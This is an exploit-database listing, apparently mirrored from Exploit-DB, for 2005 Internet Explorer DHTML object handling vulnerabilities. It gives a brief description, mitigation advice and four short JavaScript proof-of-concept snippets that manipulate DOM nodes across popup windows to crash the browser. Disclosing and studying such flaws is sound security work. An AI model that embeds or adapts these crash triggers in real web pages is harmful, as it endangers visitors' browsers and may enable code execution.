header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
Skylined /str0ke
7.5
CVSS
HIGH
DHTML Object Handling
CWE
Product Name: Internet Explorer
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2005

Microsoft Internet Explorer DHTML Object Handling Vulnerabilities

The exploit involves using JavaScript to create and manipulate objects in Internet Explorer. By using certain methods, an attacker can cause unexpected behavior or crash the browser. This can potentially lead to remote code execution.

Mitigation:

To mitigate these vulnerabilities, users should update their Internet Explorer to the latest version and apply any available patches. It is also recommended to use a different browser if possible.
Source

Exploit-DB raw data:

<!-- Here are multiple Microsoft Internet Explorer DHTML Object Handling Vulnerabilities by Skylined /str0ke -->

<SCRIPT language="javascript">
    a=document.createTextNode();try{window.open().document.appendChild(a);}catch(e){}document.removeChild(a);
</SCRIPT>

<SCRIPT language="javascript">
  p=document.createElement();c=window.open().document.createElement();try{c.appendChild(p);}catch(e){p.removeChild(c);};
</SCRIPT>

<SCRIPT language="javascript">
    try{window.open().document.appendChild(document);}catch(e){}
</SCRIPT>

<SCRIPT>
    try{window.open().document.appendChild(document.all[0]);}catch(e){}
</SCRIPT>

# milw0rm.com [2005-04-12]

Navigation

Suggest Exploit

Services By CQR